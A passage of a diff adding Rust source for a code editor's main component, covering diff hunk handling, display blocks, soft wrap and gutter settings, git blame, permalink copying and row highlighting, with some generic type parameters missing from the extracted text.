!buffer.all_diff_hunks_expanded() + && buffer.has_expanded_diff_hunks_in_ranges(&ranges, cx) + { + buffer.collapse_diff_hunks(ranges, cx); + true + } else { + false + } + }) + } + + fn toggle_diff_hunks_in_ranges( + &mut self, + 
ranges: Vec>, + cx: &mut Context, + ) { + self.buffer.update(cx, |buffer, cx| { + let expand = !buffer.has_expanded_diff_hunks_in_ranges(&ranges, cx); + buffer.expand_or_collapse_diff_hunks(ranges, expand, cx); + }) + } + + fn toggle_single_diff_hunk(&mut self, range: Range, cx: &mut Context) { + self.buffer.update(cx, |buffer, cx| { + let snapshot = buffer.snapshot(cx); + let excerpt_id = range.end.excerpt_id; + let point_range = range.to_point(&snapshot); + let expand = !buffer.single_hunk_is_expanded(range, cx); + buffer.expand_or_collapse_diff_hunks_inner([(point_range, excerpt_id)], expand, cx); + }) + } + + pub(crate) fn apply_all_diff_hunks( + &mut self, + _: &ApplyAllDiffHunks, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + + let buffers = self.buffer.read(cx).all_buffers(); + for branch_buffer in buffers { + branch_buffer.update(cx, |branch_buffer, cx| { + branch_buffer.merge_into_base(Vec::new(), cx); + }); + } + + if let Some(project) = self.project.clone() { + self.save(true, project, window, cx).detach_and_log_err(cx); + } + } + + pub(crate) fn apply_selected_diff_hunks( + &mut self, + _: &ApplyDiffHunk, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + let snapshot = self.snapshot(window, cx); + let hunks = snapshot.hunks_for_ranges(self.selections.ranges(cx)); + let mut ranges_by_buffer = HashMap::default(); + self.transact(window, cx, |editor, _window, cx| { + for hunk in hunks { + if let Some(buffer) = editor.buffer.read(cx).buffer(hunk.buffer_id) { + ranges_by_buffer + .entry(buffer.clone()) + .or_insert_with(Vec::new) + .push(hunk.buffer_range.to_offset(buffer.read(cx))); + } + } + + for (buffer, ranges) in ranges_by_buffer { + buffer.update(cx, |buffer, cx| { + buffer.merge_into_base(ranges, cx); + }); + } + }); + + if let Some(project) = self.project.clone() { + self.save(true, project, window, 
cx).detach_and_log_err(cx); + } + } + + pub fn set_gutter_hovered(&mut self, hovered: bool, cx: &mut Context) { + if hovered != self.gutter_hovered { + self.gutter_hovered = hovered; + cx.notify(); + } + } + + pub fn insert_blocks( + &mut self, + blocks: impl IntoIterator>, + autoscroll: Option, + cx: &mut Context, + ) -> Vec { + let blocks = self + .display_map + .update(cx, |display_map, cx| display_map.insert_blocks(blocks, cx)); + if let Some(autoscroll) = autoscroll { + self.request_autoscroll(autoscroll, cx); + } + cx.notify(); + blocks + } + + pub fn resize_blocks( + &mut self, + heights: HashMap, + autoscroll: Option, + cx: &mut Context, + ) { + self.display_map + .update(cx, |display_map, cx| display_map.resize_blocks(heights, cx)); + if let Some(autoscroll) = autoscroll { + self.request_autoscroll(autoscroll, cx); + } + cx.notify(); + } + + pub fn replace_blocks( + &mut self, + renderers: HashMap, + autoscroll: Option, + cx: &mut Context, + ) { + self.display_map + .update(cx, |display_map, _cx| display_map.replace_blocks(renderers)); + if let Some(autoscroll) = autoscroll { + self.request_autoscroll(autoscroll, cx); + } + cx.notify(); + } + + pub fn remove_blocks( + &mut self, + block_ids: HashSet, + autoscroll: Option, + cx: &mut Context, + ) { + self.display_map.update(cx, |display_map, cx| { + display_map.remove_blocks(block_ids, cx) + }); + if let Some(autoscroll) = autoscroll { + self.request_autoscroll(autoscroll, cx); + } + cx.notify(); + } + + pub fn row_for_block( + &self, + block_id: CustomBlockId, + cx: &mut Context, + ) -> Option { + self.display_map + .update(cx, |map, cx| map.row_for_block(block_id, cx)) + } + + pub(crate) fn set_focused_block(&mut self, focused_block: FocusedBlock) { + self.focused_block = Some(focused_block); + } + + pub(crate) fn take_focused_block(&mut self) -> Option { + self.focused_block.take() + } + + pub fn insert_creases( + &mut self, + creases: impl IntoIterator>, + cx: &mut Context, + ) -> Vec { + 
self.display_map + .update(cx, |map, cx| map.insert_creases(creases, cx)) + } + + pub fn remove_creases( + &mut self, + ids: impl IntoIterator, + cx: &mut Context, + ) { + self.display_map + .update(cx, |map, cx| map.remove_creases(ids, cx)); + } + + pub fn longest_row(&self, cx: &mut App) -> DisplayRow { + self.display_map + .update(cx, |map, cx| map.snapshot(cx)) + .longest_row() + } + + pub fn max_point(&self, cx: &mut App) -> DisplayPoint { + self.display_map + .update(cx, |map, cx| map.snapshot(cx)) + .max_point() + } + + pub fn text(&self, cx: &App) -> String { + self.buffer.read(cx).read(cx).text() + } + + pub fn is_empty(&self, cx: &App) -> bool { + self.buffer.read(cx).read(cx).is_empty() + } + + pub fn text_option(&self, cx: &App) -> Option { + let text = self.text(cx); + let text = text.trim(); + + if text.is_empty() { + return None; + } + + Some(text.to_string()) + } + + pub fn set_text( + &mut self, + text: impl Into>, + window: &mut Window, + cx: &mut Context, + ) { + self.transact(window, cx, |this, _, cx| { + this.buffer + .read(cx) + .as_singleton() + .expect("you can only call set_text on editors for singleton buffers") + .update(cx, |buffer, cx| buffer.set_text(text, cx)); + }); + } + + pub fn display_text(&self, cx: &mut App) -> String { + self.display_map + .update(cx, |map, cx| map.snapshot(cx)) + .text() + } + + pub fn wrap_guides(&self, cx: &App) -> SmallVec<[(usize, bool); 2]> { + let mut wrap_guides = smallvec::smallvec![]; + + if self.show_wrap_guides == Some(false) { + return wrap_guides; + } + + let settings = self.buffer.read(cx).language_settings(cx); + if settings.show_wrap_guides { + match self.soft_wrap_mode(cx) { + SoftWrap::Column(soft_wrap) => { + wrap_guides.push((soft_wrap as usize, true)); + } + SoftWrap::Bounded(soft_wrap) => { + wrap_guides.push((soft_wrap as usize, true)); + } + SoftWrap::GitDiff | SoftWrap::None | SoftWrap::EditorWidth => {} + } + wrap_guides.extend(settings.wrap_guides.iter().map(|guide| (*guide, 
false))) + } + + wrap_guides + } + + pub fn soft_wrap_mode(&self, cx: &App) -> SoftWrap { + let settings = self.buffer.read(cx).language_settings(cx); + let mode = self.soft_wrap_mode_override.unwrap_or(settings.soft_wrap); + match mode { + language_settings::SoftWrap::PreferLine | language_settings::SoftWrap::None => { + SoftWrap::None + } + language_settings::SoftWrap::EditorWidth => SoftWrap::EditorWidth, + language_settings::SoftWrap::PreferredLineLength => { + SoftWrap::Column(settings.preferred_line_length) + } + language_settings::SoftWrap::Bounded => { + SoftWrap::Bounded(settings.preferred_line_length) + } + } + } + + pub fn set_soft_wrap_mode( + &mut self, + mode: language_settings::SoftWrap, + + cx: &mut Context, + ) { + self.soft_wrap_mode_override = Some(mode); + cx.notify(); + } + + pub fn set_hard_wrap(&mut self, hard_wrap: Option, cx: &mut Context) { + self.hard_wrap = hard_wrap; + cx.notify(); + } + + pub fn set_text_style_refinement(&mut self, style: TextStyleRefinement) { + self.text_style_refinement = Some(style); + } + + /// called by the Element so we know what style we were most recently rendered with. + pub(crate) fn set_style( + &mut self, + style: EditorStyle, + window: &mut Window, + cx: &mut Context, + ) { + let rem_size = window.rem_size(); + self.display_map.update(cx, |map, cx| { + map.set_font( + style.text.font(), + style.text.font_size.to_pixels(rem_size), + cx, + ) + }); + self.style = Some(style); + } + + pub fn style(&self) -> Option<&EditorStyle> { + self.style.as_ref() + } + + // Called by the element. This method is not designed to be called outside of the editor + // element's layout code because it does not notify when rewrapping is computed synchronously. 
+ pub(crate) fn set_wrap_width(&self, width: Option, cx: &mut App) -> bool { + self.display_map + .update(cx, |map, cx| map.set_wrap_width(width, cx)) + } + + pub fn set_soft_wrap(&mut self) { + self.soft_wrap_mode_override = Some(language_settings::SoftWrap::EditorWidth) + } + + pub fn toggle_soft_wrap(&mut self, _: &ToggleSoftWrap, _: &mut Window, cx: &mut Context) { + if self.soft_wrap_mode_override.is_some() { + self.soft_wrap_mode_override.take(); + } else { + let soft_wrap = match self.soft_wrap_mode(cx) { + SoftWrap::GitDiff => return, + SoftWrap::None => language_settings::SoftWrap::EditorWidth, + SoftWrap::EditorWidth | SoftWrap::Column(_) | SoftWrap::Bounded(_) => { + language_settings::SoftWrap::None + } + }; + self.soft_wrap_mode_override = Some(soft_wrap); + } + cx.notify(); + } + + pub fn toggle_tab_bar(&mut self, _: &ToggleTabBar, _: &mut Window, cx: &mut Context) { + let Some(workspace) = self.workspace() else { + return; + }; + let fs = workspace.read(cx).app_state().fs.clone(); + let current_show = TabBarSettings::get_global(cx).show; + update_settings_file::(fs, cx, move |setting, _| { + setting.show = Some(!current_show); + }); + } + + pub fn toggle_indent_guides( + &mut self, + _: &ToggleIndentGuides, + _: &mut Window, + cx: &mut Context, + ) { + let currently_enabled = self.should_show_indent_guides().unwrap_or_else(|| { + self.buffer + .read(cx) + .language_settings(cx) + .indent_guides + .enabled + }); + self.show_indent_guides = Some(!currently_enabled); + cx.notify(); + } + + fn should_show_indent_guides(&self) -> Option { + self.show_indent_guides + } + + pub fn toggle_line_numbers( + &mut self, + _: &ToggleLineNumbers, + _: &mut Window, + cx: &mut Context, + ) { + let mut editor_settings = EditorSettings::get_global(cx).clone(); + editor_settings.gutter.line_numbers = !editor_settings.gutter.line_numbers; + EditorSettings::override_global(editor_settings, cx); + } + + pub fn line_numbers_enabled(&self, cx: &App) -> bool { + if let 
Some(show_line_numbers) = self.show_line_numbers { + return show_line_numbers; + } + EditorSettings::get_global(cx).gutter.line_numbers + } + + pub fn should_use_relative_line_numbers(&self, cx: &mut App) -> bool { + self.use_relative_line_numbers + .unwrap_or(EditorSettings::get_global(cx).relative_line_numbers) + } + + pub fn toggle_relative_line_numbers( + &mut self, + _: &ToggleRelativeLineNumbers, + _: &mut Window, + cx: &mut Context, + ) { + let is_relative = self.should_use_relative_line_numbers(cx); + self.set_relative_line_number(Some(!is_relative), cx) + } + + pub fn set_relative_line_number(&mut self, is_relative: Option, cx: &mut Context) { + self.use_relative_line_numbers = is_relative; + cx.notify(); + } + + pub fn set_show_gutter(&mut self, show_gutter: bool, cx: &mut Context) { + self.show_gutter = show_gutter; + cx.notify(); + } + + pub fn set_show_scrollbars(&mut self, show_scrollbars: bool, cx: &mut Context) { + self.show_scrollbars = show_scrollbars; + cx.notify(); + } + + pub fn disable_scrolling(&mut self, cx: &mut Context) { + self.disable_scrolling = true; + cx.notify(); + } + + pub fn set_show_line_numbers(&mut self, show_line_numbers: bool, cx: &mut Context) { + self.show_line_numbers = Some(show_line_numbers); + cx.notify(); + } + + pub fn disable_expand_excerpt_buttons(&mut self, cx: &mut Context) { + self.disable_expand_excerpt_buttons = true; + cx.notify(); + } + + pub fn set_show_git_diff_gutter(&mut self, show_git_diff_gutter: bool, cx: &mut Context) { + self.show_git_diff_gutter = Some(show_git_diff_gutter); + cx.notify(); + } + + pub fn set_show_code_actions(&mut self, show_code_actions: bool, cx: &mut Context) { + self.show_code_actions = Some(show_code_actions); + cx.notify(); + } + + pub fn set_show_runnables(&mut self, show_runnables: bool, cx: &mut Context) { + self.show_runnables = Some(show_runnables); + cx.notify(); + } + + pub fn set_show_breakpoints(&mut self, show_breakpoints: bool, cx: &mut Context) { + 
self.show_breakpoints = Some(show_breakpoints); + cx.notify(); + } + + pub fn set_masked(&mut self, masked: bool, cx: &mut Context) { + if self.display_map.read(cx).masked != masked { + self.display_map.update(cx, |map, _| map.masked = masked); + } + cx.notify() + } + + pub fn set_show_wrap_guides(&mut self, show_wrap_guides: bool, cx: &mut Context) { + self.show_wrap_guides = Some(show_wrap_guides); + cx.notify(); + } + + pub fn set_show_indent_guides(&mut self, show_indent_guides: bool, cx: &mut Context) { + self.show_indent_guides = Some(show_indent_guides); + cx.notify(); + } + + pub fn working_directory(&self, cx: &App) -> Option { + if let Some(buffer) = self.buffer().read(cx).as_singleton() { + if let Some(file) = buffer.read(cx).file().and_then(|f| f.as_local()) { + if let Some(dir) = file.abs_path(cx).parent() { + return Some(dir.to_owned()); + } + } + + if let Some(project_path) = buffer.read(cx).project_path(cx) { + return Some(project_path.path.to_path_buf()); + } + } + + None + } + + fn target_file<'a>(&self, cx: &'a App) -> Option<&'a dyn language::LocalFile> { + self.active_excerpt(cx)? 
+ .1 + .read(cx) + .file() + .and_then(|f| f.as_local()) + } + + pub fn target_file_abs_path(&self, cx: &mut Context) -> Option { + self.active_excerpt(cx).and_then(|(_, buffer, _)| { + let buffer = buffer.read(cx); + if let Some(project_path) = buffer.project_path(cx) { + let project = self.project.as_ref()?.read(cx); + project.absolute_path(&project_path, cx) + } else { + buffer + .file() + .and_then(|file| file.as_local().map(|file| file.abs_path(cx))) + } + }) + } + + fn target_file_path(&self, cx: &mut Context) -> Option { + self.active_excerpt(cx).and_then(|(_, buffer, _)| { + let project_path = buffer.read(cx).project_path(cx)?; + let project = self.project.as_ref()?.read(cx); + let entry = project.entry_for_path(&project_path, cx)?; + let path = entry.path.to_path_buf(); + Some(path) + }) + } + + pub fn reveal_in_finder( + &mut self, + _: &RevealInFileManager, + _window: &mut Window, + cx: &mut Context, + ) { + if let Some(target) = self.target_file(cx) { + cx.reveal_path(&target.abs_path(cx)); + } + } + + pub fn copy_path( + &mut self, + _: &zed_actions::workspace::CopyPath, + _window: &mut Window, + cx: &mut Context, + ) { + if let Some(path) = self.target_file_abs_path(cx) { + if let Some(path) = path.to_str() { + cx.write_to_clipboard(ClipboardItem::new_string(path.to_string())); + } + } + } + + pub fn copy_relative_path( + &mut self, + _: &zed_actions::workspace::CopyRelativePath, + _window: &mut Window, + cx: &mut Context, + ) { + if let Some(path) = self.target_file_path(cx) { + if let Some(path) = path.to_str() { + cx.write_to_clipboard(ClipboardItem::new_string(path.to_string())); + } + } + } + + pub fn project_path(&self, cx: &App) -> Option { + if let Some(buffer) = self.buffer.read(cx).as_singleton() { + buffer.read(cx).project_path(cx) + } else { + None + } + } + + // Returns true if the editor handled a go-to-line request + pub fn go_to_active_debug_line(&mut self, window: &mut Window, cx: &mut Context) -> bool { + maybe!({ + let 
breakpoint_store = self.breakpoint_store.as_ref()?; + + let Some(active_stack_frame) = breakpoint_store.read(cx).active_position().cloned() + else { + self.clear_row_highlights::(); + return None; + }; + + let position = active_stack_frame.position; + let buffer_id = position.buffer_id?; + let snapshot = self + .project + .as_ref()? + .read(cx) + .buffer_for_id(buffer_id, cx)? + .read(cx) + .snapshot(); + + let mut handled = false; + for (id, ExcerptRange { context, .. }) in + self.buffer.read(cx).excerpts_for_buffer(buffer_id, cx) + { + if context.start.cmp(&position, &snapshot).is_ge() + || context.end.cmp(&position, &snapshot).is_lt() + { + continue; + } + let snapshot = self.buffer.read(cx).snapshot(cx); + let multibuffer_anchor = snapshot.anchor_in_excerpt(id, position)?; + + handled = true; + self.clear_row_highlights::(); + self.go_to_line::( + multibuffer_anchor, + Some(cx.theme().colors().editor_debugger_active_line_background), + window, + cx, + ); + + cx.notify(); + } + + handled.then_some(()) + }) + .is_some() + } + + pub fn copy_file_name_without_extension( + &mut self, + _: &CopyFileNameWithoutExtension, + _: &mut Window, + cx: &mut Context, + ) { + if let Some(file) = self.target_file(cx) { + if let Some(file_stem) = file.path().file_stem() { + if let Some(name) = file_stem.to_str() { + cx.write_to_clipboard(ClipboardItem::new_string(name.to_string())); + } + } + } + } + + pub fn copy_file_name(&mut self, _: &CopyFileName, _: &mut Window, cx: &mut Context) { + if let Some(file) = self.target_file(cx) { + if let Some(file_name) = file.path().file_name() { + if let Some(name) = file_name.to_str() { + cx.write_to_clipboard(ClipboardItem::new_string(name.to_string())); + } + } + } + } + + pub fn toggle_git_blame( + &mut self, + _: &::git::Blame, + window: &mut Window, + cx: &mut Context, + ) { + self.show_git_blame_gutter = !self.show_git_blame_gutter; + + if self.show_git_blame_gutter && !self.has_blame_entries(cx) { + self.start_git_blame(true, window, 
cx); + } + + cx.notify(); + } + + pub fn toggle_git_blame_inline( + &mut self, + _: &ToggleGitBlameInline, + window: &mut Window, + cx: &mut Context, + ) { + self.toggle_git_blame_inline_internal(true, window, cx); + cx.notify(); + } + + pub fn open_git_blame_commit( + &mut self, + _: &OpenGitBlameCommit, + window: &mut Window, + cx: &mut Context, + ) { + self.open_git_blame_commit_internal(window, cx); + } + + fn open_git_blame_commit_internal( + &mut self, + window: &mut Window, + cx: &mut Context, + ) -> Option<()> { + let blame = self.blame.as_ref()?; + let snapshot = self.snapshot(window, cx); + let cursor = self.selections.newest::(cx).head(); + let (buffer, point, _) = snapshot.buffer_snapshot.point_to_buffer_point(cursor)?; + let blame_entry = blame + .update(cx, |blame, cx| { + blame + .blame_for_rows( + &[RowInfo { + buffer_id: Some(buffer.remote_id()), + buffer_row: Some(point.row), + ..Default::default() + }], + cx, + ) + .next() + }) + .flatten()?; + let renderer = cx.global::().0.clone(); + let repo = blame.read(cx).repository(cx)?; + let workspace = self.workspace()?.downgrade(); + renderer.open_blame_commit(blame_entry, repo, workspace, window, cx); + None + } + + pub fn git_blame_inline_enabled(&self) -> bool { + self.git_blame_inline_enabled + } + + pub fn toggle_selection_menu( + &mut self, + _: &ToggleSelectionMenu, + _: &mut Window, + cx: &mut Context, + ) { + self.show_selection_menu = self + .show_selection_menu + .map(|show_selections_menu| !show_selections_menu) + .or_else(|| Some(!EditorSettings::get_global(cx).toolbar.selections_menu)); + + cx.notify(); + } + + pub fn selection_menu_enabled(&self, cx: &App) -> bool { + self.show_selection_menu + .unwrap_or_else(|| EditorSettings::get_global(cx).toolbar.selections_menu) + } + + fn start_git_blame( + &mut self, + user_triggered: bool, + window: &mut Window, + cx: &mut Context, + ) { + if let Some(project) = self.project.as_ref() { + let Some(buffer) = self.buffer().read(cx).as_singleton() 
else { + return; + }; + + if buffer.read(cx).file().is_none() { + return; + } + + let focused = self.focus_handle(cx).contains_focused(window, cx); + + let project = project.clone(); + let blame = cx.new(|cx| GitBlame::new(buffer, project, user_triggered, focused, cx)); + self.blame_subscription = + Some(cx.observe_in(&blame, window, |_, _, _, cx| cx.notify())); + self.blame = Some(blame); + } + } + + fn toggle_git_blame_inline_internal( + &mut self, + user_triggered: bool, + window: &mut Window, + cx: &mut Context, + ) { + if self.git_blame_inline_enabled { + self.git_blame_inline_enabled = false; + self.show_git_blame_inline = false; + self.show_git_blame_inline_delay_task.take(); + } else { + self.git_blame_inline_enabled = true; + self.start_git_blame_inline(user_triggered, window, cx); + } + + cx.notify(); + } + + fn start_git_blame_inline( + &mut self, + user_triggered: bool, + window: &mut Window, + cx: &mut Context, + ) { + self.start_git_blame(user_triggered, window, cx); + + if ProjectSettings::get_global(cx) + .git + .inline_blame_delay() + .is_some() + { + self.start_inline_blame_timer(window, cx); + } else { + self.show_git_blame_inline = true + } + } + + pub fn blame(&self) -> Option<&Entity> { + self.blame.as_ref() + } + + pub fn show_git_blame_gutter(&self) -> bool { + self.show_git_blame_gutter + } + + pub fn render_git_blame_gutter(&self, cx: &App) -> bool { + self.show_git_blame_gutter && self.has_blame_entries(cx) + } + + pub fn render_git_blame_inline(&self, window: &Window, cx: &App) -> bool { + self.show_git_blame_inline + && (self.focus_handle.is_focused(window) || self.inline_blame_popover.is_some()) + && !self.newest_selection_head_on_empty_line(cx) + && self.has_blame_entries(cx) + } + + fn has_blame_entries(&self, cx: &App) -> bool { + self.blame() + .map_or(false, |blame| blame.read(cx).has_generated_entries()) + } + + fn newest_selection_head_on_empty_line(&self, cx: &App) -> bool { + let cursor_anchor = 
self.selections.newest_anchor().head(); + + let snapshot = self.buffer.read(cx).snapshot(cx); + let buffer_row = MultiBufferRow(cursor_anchor.to_point(&snapshot).row); + + snapshot.line_len(buffer_row) == 0 + } + + fn get_permalink_to_line(&self, cx: &mut Context) -> Task> { + let buffer_and_selection = maybe!({ + let selection = self.selections.newest::(cx); + let selection_range = selection.range(); + + let multi_buffer = self.buffer().read(cx); + let multi_buffer_snapshot = multi_buffer.snapshot(cx); + let buffer_ranges = multi_buffer_snapshot.range_to_buffer_ranges(selection_range); + + let (buffer, range, _) = if selection.reversed { + buffer_ranges.first() + } else { + buffer_ranges.last() + }?; + + let selection = text::ToPoint::to_point(&range.start, &buffer).row + ..text::ToPoint::to_point(&range.end, &buffer).row; + Some(( + multi_buffer.buffer(buffer.remote_id()).unwrap().clone(), + selection, + )) + }); + + let Some((buffer, selection)) = buffer_and_selection else { + return Task::ready(Err(anyhow!("failed to determine buffer and selection"))); + }; + + let Some(project) = self.project.as_ref() else { + return Task::ready(Err(anyhow!("editor does not have project"))); + }; + + project.update(cx, |project, cx| { + project.get_permalink_to_line(&buffer, selection, cx) + }) + } + + pub fn copy_permalink_to_line( + &mut self, + _: &CopyPermalinkToLine, + window: &mut Window, + cx: &mut Context, + ) { + let permalink_task = self.get_permalink_to_line(cx); + let workspace = self.workspace(); + + cx.spawn_in(window, async move |_, cx| match permalink_task.await { + Ok(permalink) => { + cx.update(|_, cx| { + cx.write_to_clipboard(ClipboardItem::new_string(permalink.to_string())); + }) + .ok(); + } + Err(err) => { + let message = format!("Failed to copy permalink: {err}"); + + anyhow::Result::<()>::Err(err).log_err(); + + if let Some(workspace) = workspace { + workspace + .update_in(cx, |workspace, _, cx| { + struct CopyPermalinkToLine; + + workspace.show_toast( 
+ Toast::new( + NotificationId::unique::(), + message, + ), + cx, + ) + }) + .ok(); + } + } + }) + .detach(); + } + + pub fn copy_file_location( + &mut self, + _: &CopyFileLocation, + _: &mut Window, + cx: &mut Context, + ) { + let selection = self.selections.newest::(cx).start.row + 1; + if let Some(file) = self.target_file(cx) { + if let Some(path) = file.path().to_str() { + cx.write_to_clipboard(ClipboardItem::new_string(format!("{path}:{selection}"))); + } + } + } + + pub fn open_permalink_to_line( + &mut self, + _: &OpenPermalinkToLine, + window: &mut Window, + cx: &mut Context, + ) { + let permalink_task = self.get_permalink_to_line(cx); + let workspace = self.workspace(); + + cx.spawn_in(window, async move |_, cx| match permalink_task.await { + Ok(permalink) => { + cx.update(|_, cx| { + cx.open_url(permalink.as_ref()); + }) + .ok(); + } + Err(err) => { + let message = format!("Failed to open permalink: {err}"); + + anyhow::Result::<()>::Err(err).log_err(); + + if let Some(workspace) = workspace { + workspace + .update(cx, |workspace, cx| { + struct OpenPermalinkToLine; + + workspace.show_toast( + Toast::new( + NotificationId::unique::(), + message, + ), + cx, + ) + }) + .ok(); + } + } + }) + .detach(); + } + + pub fn insert_uuid_v4( + &mut self, + _: &InsertUuidV4, + window: &mut Window, + cx: &mut Context, + ) { + self.insert_uuid(UuidVersion::V4, window, cx); + } + + pub fn insert_uuid_v7( + &mut self, + _: &InsertUuidV7, + window: &mut Window, + cx: &mut Context, + ) { + self.insert_uuid(UuidVersion::V7, window, cx); + } + + fn insert_uuid(&mut self, version: UuidVersion, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.transact(window, cx, |this, window, cx| { + let edits = this + .selections + .all::(cx) + .into_iter() + .map(|selection| { + let uuid = match version { + UuidVersion::V4 => uuid::Uuid::new_v4(), + UuidVersion::V7 => uuid::Uuid::now_v7(), + }; + + (selection.range(), 
uuid.to_string()) + }); + this.edit(edits, cx); + this.refresh_inline_completion(true, false, window, cx); + }); + } + + pub fn open_selections_in_multibuffer( + &mut self, + _: &OpenSelectionsInMultibuffer, + window: &mut Window, + cx: &mut Context, + ) { + let multibuffer = self.buffer.read(cx); + + let Some(buffer) = multibuffer.as_singleton() else { + return; + }; + + let Some(workspace) = self.workspace() else { + return; + }; + + let locations = self + .selections + .disjoint_anchors() + .iter() + .map(|range| Location { + buffer: buffer.clone(), + range: range.start.text_anchor..range.end.text_anchor, + }) + .collect::>(); + + let title = multibuffer.title(cx).to_string(); + + cx.spawn_in(window, async move |_, cx| { + workspace.update_in(cx, |workspace, window, cx| { + Self::open_locations_in_multibuffer( + workspace, + locations, + format!("Selections for '{title}'"), + false, + MultibufferSelectionMode::All, + window, + cx, + ); + }) + }) + .detach(); + } + + /// Adds a row highlight for the given range. If a row has multiple highlights, the + /// last highlight added will be used. + /// + /// If the range ends at the beginning of a line, then that line will not be highlighted. + pub fn highlight_rows( + &mut self, + range: Range, + color: Hsla, + options: RowHighlightOptions, + cx: &mut Context, + ) { + let snapshot = self.buffer().read(cx).snapshot(cx); + let row_highlights = self.highlighted_rows.entry(TypeId::of::()).or_default(); + let ix = row_highlights.binary_search_by(|highlight| { + Ordering::Equal + .then_with(|| highlight.range.start.cmp(&range.start, &snapshot)) + .then_with(|| highlight.range.end.cmp(&range.end, &snapshot)) + }); + + if let Err(mut ix) = ix { + let index = post_inc(&mut self.highlight_order); + + // If this range intersects with the preceding highlight, then merge it with + // the preceding highlight. Otherwise insert a new highlight. 
+ let mut merged = false; + if ix > 0 { + let prev_highlight = &mut row_highlights[ix - 1]; + if prev_highlight + .range + .end + .cmp(&range.start, &snapshot) + .is_ge() + { + ix -= 1; + if prev_highlight.range.end.cmp(&range.end, &snapshot).is_lt() { + prev_highlight.range.end = range.end; + } + merged = true; + prev_highlight.index = index; + prev_highlight.color = color; + prev_highlight.options = options; + } + } + + if !merged { + row_highlights.insert( + ix, + RowHighlight { + range: range.clone(), + index, + color, + options, + type_id: TypeId::of::(), + }, + ); + } + + // If any of the following highlights intersect with this one, merge them. + while let Some(next_highlight) = row_highlights.get(ix + 1) { + let highlight = &row_highlights[ix]; + if next_highlight + .range + .start + .cmp(&highlight.range.end, &snapshot) + .is_le() + { + if next_highlight + .range + .end + .cmp(&highlight.range.end, &snapshot) + .is_gt() + { + row_highlights[ix].range.end = next_highlight.range.end; + } + row_highlights.remove(ix + 1); + } else { + break; + } + } + } + } + + /// Remove any highlighted row ranges of the given type that intersect the + /// given ranges. 
+ pub fn remove_highlighted_rows( + &mut self, + ranges_to_remove: Vec>, + cx: &mut Context, + ) { + let snapshot = self.buffer().read(cx).snapshot(cx); + let row_highlights = self.highlighted_rows.entry(TypeId::of::()).or_default(); + let mut ranges_to_remove = ranges_to_remove.iter().peekable(); + row_highlights.retain(|highlight| { + while let Some(range_to_remove) = ranges_to_remove.peek() { + match range_to_remove.end.cmp(&highlight.range.start, &snapshot) { + Ordering::Less | Ordering::Equal => { + ranges_to_remove.next(); + } + Ordering::Greater => { + match range_to_remove.start.cmp(&highlight.range.end, &snapshot) { + Ordering::Less | Ordering::Equal => { + return false; + } + Ordering::Greater => break, + } + } + } + } + + true + }) + } + + /// Clear all anchor ranges for a certain highlight context type, so no corresponding rows will be highlighted. + pub fn clear_row_highlights(&mut self) { + self.highlighted_rows.remove(&TypeId::of::()); + } + + /// For a highlight given context type, gets all anchor ranges that will be used for row highlighting. + pub fn highlighted_rows(&self) -> impl '_ + Iterator, Hsla)> { + self.highlighted_rows + .get(&TypeId::of::()) + .map_or(&[] as &[_], |vec| vec.as_slice()) + .iter() + .map(|highlight| (highlight.range.clone(), highlight.color)) + } + + /// Merges all anchor ranges for all context types ever set, picking the last highlight added in case of a row conflict. + /// Returns a map of display rows that are highlighted and their corresponding highlight color. + /// Allows to ignore certain kinds of highlights. 
+ pub fn highlighted_display_rows( + &self, + window: &mut Window, + cx: &mut App, + ) -> BTreeMap { + let snapshot = self.snapshot(window, cx); + let mut used_highlight_orders = HashMap::default(); + self.highlighted_rows + .iter() + .flat_map(|(_, highlighted_rows)| highlighted_rows.iter()) + .fold( + BTreeMap::::new(), + |mut unique_rows, highlight| { + let start = highlight.range.start.to_display_point(&snapshot); + let end = highlight.range.end.to_display_point(&snapshot); + let start_row = start.row().0; + let end_row = if highlight.range.end.text_anchor != text::Anchor::MAX + && end.column() == 0 + { + end.row().0.saturating_sub(1) + } else { + end.row().0 + }; + for row in start_row..=end_row { + let used_index = + used_highlight_orders.entry(row).or_insert(highlight.index); + if highlight.index >= *used_index { + *used_index = highlight.index; + unique_rows.insert( + DisplayRow(row), + LineHighlight { + include_gutter: highlight.options.include_gutter, + border: None, + background: highlight.color.into(), + type_id: Some(highlight.type_id), + }, + ); + } + } + unique_rows + }, + ) + } + + pub fn highlighted_display_row_for_autoscroll( + &self, + snapshot: &DisplaySnapshot, + ) -> Option { + self.highlighted_rows + .values() + .flat_map(|highlighted_rows| highlighted_rows.iter()) + .filter_map(|highlight| { + if highlight.options.autoscroll { + Some(highlight.range.start.to_display_point(snapshot).row()) + } else { + None + } + }) + .min() + } + + pub fn set_search_within_ranges(&mut self, ranges: &[Range], cx: &mut Context) { + self.highlight_background::( + ranges, + |colors| colors.editor_document_highlight_read_background, + cx, + ) + } + + pub fn set_breadcrumb_header(&mut self, new_header: String) { + self.breadcrumb_header = Some(new_header); + } + + pub fn clear_search_within_ranges(&mut self, cx: &mut Context) { + self.clear_background_highlights::(cx); + } + + pub fn highlight_background( + &mut self, + ranges: &[Range], + color_fetcher: 
fn(&ThemeColors) -> Hsla, + cx: &mut Context, + ) { + self.background_highlights + .insert(TypeId::of::(), (color_fetcher, Arc::from(ranges))); + self.scrollbar_marker_state.dirty = true; + cx.notify(); + } + + pub fn clear_background_highlights( + &mut self, + cx: &mut Context, + ) -> Option { + let text_highlights = self.background_highlights.remove(&TypeId::of::())?; + if !text_highlights.1.is_empty() { + self.scrollbar_marker_state.dirty = true; + cx.notify(); + } + Some(text_highlights) + } + + pub fn highlight_gutter( + &mut self, + ranges: &[Range], + color_fetcher: fn(&App) -> Hsla, + cx: &mut Context, + ) { + self.gutter_highlights + .insert(TypeId::of::(), (color_fetcher, Arc::from(ranges))); + cx.notify(); + } + + pub fn clear_gutter_highlights( + &mut self, + cx: &mut Context, + ) -> Option { + cx.notify(); + self.gutter_highlights.remove(&TypeId::of::()) + } + + #[cfg(feature = "test-support")] + pub fn all_text_background_highlights( + &self, + window: &mut Window, + cx: &mut Context, + ) -> Vec<(Range, Hsla)> { + let snapshot = self.snapshot(window, cx); + let buffer = &snapshot.buffer_snapshot; + let start = buffer.anchor_before(0); + let end = buffer.anchor_after(buffer.len()); + let theme 